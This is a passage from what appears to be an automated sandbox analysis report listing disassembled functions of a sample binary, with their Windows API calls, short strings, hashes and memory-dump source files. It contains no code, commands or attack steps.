                                                                                                                                                                                                                                                                                • Part of subcall function 00710413: __onexit.LIBCMT ref: 00710419
                                                                                                                                                                                                                                                                              • __Init_thread_footer.LIBCMT ref: 00778658
                                                                                                                                                                                                                                                                                • Part of subcall function 00710568: EnterCriticalSection.KERNEL32(007C170C,00000000,?,006FD258,007C3570,007327C9,00000001,00000000,?,?,0076F023,?,?,00000000,00000001,?), ref: 00710572
                                                                                                                                                                                                                                                                                • Part of subcall function 00710568: LeaveCriticalSection.KERNEL32(007C170C,?,006FD258,007C3570,007327C9,00000001,00000000,?,?,0076F023,?,?,00000000,00000001,?,00000001), ref: 007105A5
                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397353438.00000000006F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.000000000078D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.00000000007B3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397683734.00000000007BD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397743188.00000000007C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_6f0000_Inf.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: CriticalSection$EnterLeave$Init_thread_footer__onexit_wcslen
                                                                                                                                                                                                                                                                              • String ID: Variable must be of type 'Object'.$bnu
                                                                                                                                                                                                                                                                              • API String ID: 535116098-1566058606
                                                                                                                                                                                                                                                                              • Opcode ID: dbff8424b1111f972050ce2c6d5c09adac12ecfac0075f5ca77cd51494490d98
                                                                                                                                                                                                                                                                              • Instruction ID: 379a1249710d48ce3ef51a6ab622cc360c36c87162d6c2bfeb1ab42be5e0e999
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: dbff8424b1111f972050ce2c6d5c09adac12ecfac0075f5ca77cd51494490d98
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 39916D74A40208EFCF44EF94D899DAD77B2BF04340F10815DF91AAB292DB79AE41CB52
                                                                                                                                                                                                                                                                              Function 007657CC Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 230shareCOMMON
                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                • Part of subcall function 006F41EA: _wcslen.LIBCMT ref: 006F41EF
                                                                                                                                                                                                                                                                              • WNetUseConnectionW.MPR(00000000,?,0000002A,00000000,?,?,0000002A,?), ref: 00765919
                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397353438.00000000006F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.000000000078D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.00000000007B3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397683734.00000000007BD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397743188.00000000007C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_6f0000_Inf.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: Connection_wcslen
                                                                                                                                                                                                                                                                              • String ID: *$LPT
                                                                                                                                                                                                                                                                              • API String ID: 1725874428-3443410124
                                                                                                                                                                                                                                                                              • Opcode ID: 71b479c722b9e3a800c9bceb49cee2ef333656944c3cd44de7267734ba0218ed
                                                                                                                                                                                                                                                                              • Instruction ID: bc0392683b619f84cb894f64f6c12f5b68f66c2076097f0d21e998bf8295a0c7
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 71b479c722b9e3a800c9bceb49cee2ef333656944c3cd44de7267734ba0218ed
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2C917F75A00604DFCB14DF94C4D4EAABBF1AF44314F188099E84A9F362CB79EE85DB90
                                                                                                                                                                                                                                                                              Function 00755703 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 223comCOMMON
                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              • OleSetContainedObject.OLE32(?,00000001), ref: 007558AF
                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397353438.00000000006F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.000000000078D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.00000000007B3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397683734.00000000007BD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397743188.00000000007C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_6f0000_Inf.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: ContainedObject
                                                                                                                                                                                                                                                                              • String ID: 0$|$Container
                                                                                                                                                                                                                                                                              • API String ID: 3565006973-49173154
                                                                                                                                                                                                                                                                              • Opcode ID: d8986f9ce5992b2fabc5d23c4c8de03939e92de44dbb15fa5b6811a07e591098
                                                                                                                                                                                                                                                                              • Instruction ID: c54b93a35e6a74917c540479ee8b33f23bf384fdb2a6c79f3ddd6f219325ef8c
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: d8986f9ce5992b2fabc5d23c4c8de03939e92de44dbb15fa5b6811a07e591098
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 23811870600601EFDB14DF54C898BAABBF5FF48711F14856DE94ACB291DBB8A845CB90
                                                                                                                                                                                                                                                                              Function 0070A8EC Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 184COMMON
                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397353438.00000000006F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.000000000078D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.00000000007B3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397683734.00000000007BD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397743188.00000000007C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_6f0000_Inf.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                                              • String ID: #
                                                                                                                                                                                                                                                                              • API String ID: 0-1885708031
                                                                                                                                                                                                                                                                              • Opcode ID: 65c89246886b58272537c42e75728921ea2f1ef60b4d778887a0021f8f2e3346
                                                                                                                                                                                                                                                                              • Instruction ID: 410428346116d1fa2a9dcae510e2f68295e193ac8d9bf137c236475e13c1a531
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 65c89246886b58272537c42e75728921ea2f1ef60b4d778887a0021f8f2e3346
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: E151167160438AEFCB65DF78C441ABE7BA0EF15310F644159F9919B2D0DB38AD42CB52
                                                                                                                                                                                                                                                                              Function 0070F6CA Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 144sleepCOMMON
                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              • Sleep.KERNEL32(00000000), ref: 0070F6DB
                                                                                                                                                                                                                                                                              • GlobalMemoryStatusEx.KERNEL32(?), ref: 0070F6F4
                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397353438.00000000006F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.000000000078D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.00000000007B3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397683734.00000000007BD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397743188.00000000007C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_6f0000_Inf.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: GlobalMemorySleepStatus
                                                                                                                                                                                                                                                                              • String ID: @
                                                                                                                                                                                                                                                                              • API String ID: 2783356886-2766056989
                                                                                                                                                                                                                                                                              • Opcode ID: bcc7d05849710c968cba4808d452377b05d626352b8ce60c0e7443831a3cbfd9
                                                                                                                                                                                                                                                                              • Instruction ID: 03387a6294fa4f732444d0cb987eda2ebfe0997113b69af1dfa8bd69fa6e6683
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: bcc7d05849710c968cba4808d452377b05d626352b8ce60c0e7443831a3cbfd9
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 205139714087489FD360AF14DC86BBBBBE9FB85300F81885DF2D9421A1DB318529CB6A
                                                                                                                                                                                                                                                                              Function 00784008 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 96COMMON
                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              • DestroyWindow.USER32(?,?,?,?), ref: 007840BD
                                                                                                                                                                                                                                                                              • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 007840F8
                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397353438.00000000006F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.000000000078D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.00000000007B3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397683734.00000000007BD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397743188.00000000007C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_6f0000_Inf.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: Window$DestroyMove
                                                                                                                                                                                                                                                                              • String ID: static
                                                                                                                                                                                                                                                                              • API String ID: 2139405536-2160076837
                                                                                                                                                                                                                                                                              • Opcode ID: ba229530d0ac347c59e3499becdd9c013c084647024f6ba16ff42d6a2a4ad86c
                                                                                                                                                                                                                                                                              • Instruction ID: f8ded107b2d4454cf7a548f3f12c36c078c18103c01d5cd1b52bfd639d792af6
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: ba229530d0ac347c59e3499becdd9c013c084647024f6ba16ff42d6a2a4ad86c
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3831BE71140605AADB20EF28CC80FFB77A9FF48760F00861DFAA587190DA79AC81CB64
                                                                                                                                                                                                                                                                              Function 00784FD5 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 95windowCOMMON
                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              • SendMessageW.USER32(00000027,00001132,00000000,?), ref: 007850BD
                                                                                                                                                                                                                                                                              • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 007850D2
                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397353438.00000000006F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.000000000078D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.00000000007B3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397683734.00000000007BD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397743188.00000000007C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_6f0000_Inf.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: MessageSend
                                                                                                                                                                                                                                                                              • String ID: '
                                                                                                                                                                                                                                                                              • API String ID: 3850602802-1997036262
                                                                                                                                                                                                                                                                              • Opcode ID: 9e219dc2f88abd359f05aa570063c2bb0b5a0dbd536a0d264612539322ebc6d6
                                                                                                                                                                                                                                                                              • Instruction ID: 8786356aee76101b06532d1f94951f5258f2a36f66579f3e422fca62a9bf4955
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9e219dc2f88abd359f05aa570063c2bb0b5a0dbd536a0d264612539322ebc6d6
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: C4316A74A0070A9FDB14DFA9C880BEE7BB5FF09300F10406AE904AB391D775A945CF90
                                                                                                                                                                                                                                                                              Function 006F20B0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 80COMMON
                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                • Part of subcall function 006F249F: GetWindowLongW.USER32(00000000,000000EB), ref: 006F24B0
                                                                                                                                                                                                                                                                                • Part of subcall function 006F2234: GetWindowLongW.USER32(?,000000EB), ref: 006F2242
                                                                                                                                                                                                                                                                              • GetParent.USER32(?), ref: 00733440
                                                                                                                                                                                                                                                                              • DefDlgProcW.USER32(?,00000133,?,?,?,?), ref: 007334CA
                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397353438.00000000006F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.000000000078D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.00000000007B3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397683734.00000000007BD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397743188.00000000007C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_6f0000_Inf.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: LongWindow$ParentProc
                                                                                                                                                                                                                                                                              • String ID: (|
                                                                                                                                                                                                                                                                              • API String ID: 2181805148-3772712737
                                                                                                                                                                                                                                                                              • Opcode ID: b93441d1b6692f31e6d611784e5e7425906a6a7b0700c0279fa8f2fb4096dae4
                                                                                                                                                                                                                                                                              • Instruction ID: 1b1f7e93efd0fbdd3fe00b315cb7669583a4cc17ffbb5881e99e4ad2745ba20d
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b93441d1b6692f31e6d611784e5e7425906a6a7b0700c0279fa8f2fb4096dae4
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9721AD30201189AFDB369F68CC69DB93B67EF06360F144258F7294B2E2C7399E52DB14
                                                                                                                                                                                                                                                                              Function 007841AC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 67COMMON
                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                • Part of subcall function 006F7873: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 006F78B1
                                                                                                                                                                                                                                                                                • Part of subcall function 006F7873: GetStockObject.GDI32(00000011), ref: 006F78C5
                                                                                                                                                                                                                                                                                • Part of subcall function 006F7873: SendMessageW.USER32(00000000,00000030,00000000), ref: 006F78CF
                                                                                                                                                                                                                                                                              • GetWindowRect.USER32(00000000,?), ref: 00784216
                                                                                                                                                                                                                                                                              • GetSysColor.USER32(00000012), ref: 00784230
                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397353438.00000000006F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.000000000078D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.00000000007B3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397683734.00000000007BD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397743188.00000000007C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_6f0000_Inf.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: Window$ColorCreateMessageObjectRectSendStock
                                                                                                                                                                                                                                                                              • String ID: static
                                                                                                                                                                                                                                                                              • API String ID: 1983116058-2160076837
                                                                                                                                                                                                                                                                              • Opcode ID: 4c978d3296cb4826d881cd1ab73977191c302c4e5b05d8dffbc13f3ca5a5a48e
                                                                                                                                                                                                                                                                              • Instruction ID: e7dd23a7c24e9abebf4587b06286c802ad6421de3c301dac22fe3173b96e3cef
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4c978d3296cb4826d881cd1ab73977191c302c4e5b05d8dffbc13f3ca5a5a48e
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 421126B265020AAFDB10EFA8CC45AFA7BE8FB08354F014528FD55E3250E678E8519B64
                                                                                                                                                                                                                                                                              Function 0076D763 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66networkCOMMON
                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 0076D7C2
                                                                                                                                                                                                                                                                              • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 0076D7EB
                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397353438.00000000006F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.000000000078D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.00000000007B3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397683734.00000000007BD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397743188.00000000007C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_6f0000_Inf.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: Internet$OpenOption
                                                                                                                                                                                                                                                                              • String ID: <local>
                                                                                                                                                                                                                                                                              • API String ID: 942729171-4266983199
                                                                                                                                                                                                                                                                              • Opcode ID: dea337d9e4b4981e5eaf1762e6ca184bd01c4275dba1eda738d4930ef5a43af8
                                                                                                                                                                                                                                                                              • Instruction ID: d9943501555bf798a96d5d1ec2ace03d86ffcedc1d1dd07b1ee72c652ba1f622
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: dea337d9e4b4981e5eaf1762e6ca184bd01c4275dba1eda738d4930ef5a43af8
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: E011C671B6523279D7344B668C85EE7BE5DEB127A4F104226B90A92180D6689C40D6F1
                                                                                                                                                                                                                                                                              Function 007575ED Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 56COMMON
                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                • Part of subcall function 006FB329: _wcslen.LIBCMT ref: 006FB333
                                                                                                                                                                                                                                                                              • CharUpperBuffW.USER32(?,?,?), ref: 0075761D
                                                                                                                                                                                                                                                                              • _wcslen.LIBCMT ref: 00757629
                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397353438.00000000006F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.000000000078D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.00000000007B3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397683734.00000000007BD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397743188.00000000007C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_6f0000_Inf.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: _wcslen$BuffCharUpper
                                                                                                                                                                                                                                                                              • String ID: STOP
                                                                                                                                                                                                                                                                              • API String ID: 1256254125-2411985666
                                                                                                                                                                                                                                                                              • Opcode ID: 30f4215f3e8ccf2c606dd6419a75d05254dc488d9fe82e3bc7cac4ab4d54c587
                                                                                                                                                                                                                                                                              • Instruction ID: 9a91b374a346bd8610b64cefbe635e10661136b6621fb151084f9deacbcbd39c
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 30f4215f3e8ccf2c606dd6419a75d05254dc488d9fe82e3bc7cac4ab4d54c587
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: C901C43260492A8FCB249EBDEC509FF73B5EF607517900528E82197195EBB9D908C690
                                                                                                                                                                                                                                                                              Function 0075262B Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52windowCOMMON
                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                • Part of subcall function 006FB329: _wcslen.LIBCMT ref: 006FB333
                                                                                                                                                                                                                                                                                • Part of subcall function 007545FD: GetClassNameW.USER32(?,?,000000FF), ref: 00754620
                                                                                                                                                                                                                                                                              • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 00752699
                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397353438.00000000006F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.000000000078D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.00000000007B3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397683734.00000000007BD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397743188.00000000007C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_6f0000_Inf.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: ClassMessageNameSend_wcslen
                                                                                                                                                                                                                                                                              • String ID: ComboBox$ListBox
                                                                                                                                                                                                                                                                              • API String ID: 624084870-1403004172
                                                                                                                                                                                                                                                                              • Opcode ID: 8e56f91309535cf81e5c5a60a962cd3c8d7fcc8fe07f3601ac2ca4976af51b4a
                                                                                                                                                                                                                                                                              • Instruction ID: 83298ebe3c8634510592a9b64e8e778317252ab890b5d040b3e5b480b1481487
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 8e56f91309535cf81e5c5a60a962cd3c8d7fcc8fe07f3601ac2ca4976af51b4a
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: D20124B5640218EBCB08EBA0CC55CFE33B9EF46321B100619BD32932C6EFB9580EC654
                                                                                                                                                                                                                                                                              Function 00752525 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50windowCOMMON
                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                • Part of subcall function 006FB329: _wcslen.LIBCMT ref: 006FB333
                                                                                                                                                                                                                                                                                • Part of subcall function 007545FD: GetClassNameW.USER32(?,?,000000FF), ref: 00754620
                                                                                                                                                                                                                                                                              • SendMessageW.USER32(?,00000180,00000000,?), ref: 00752593
                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                              Memory Dump Source
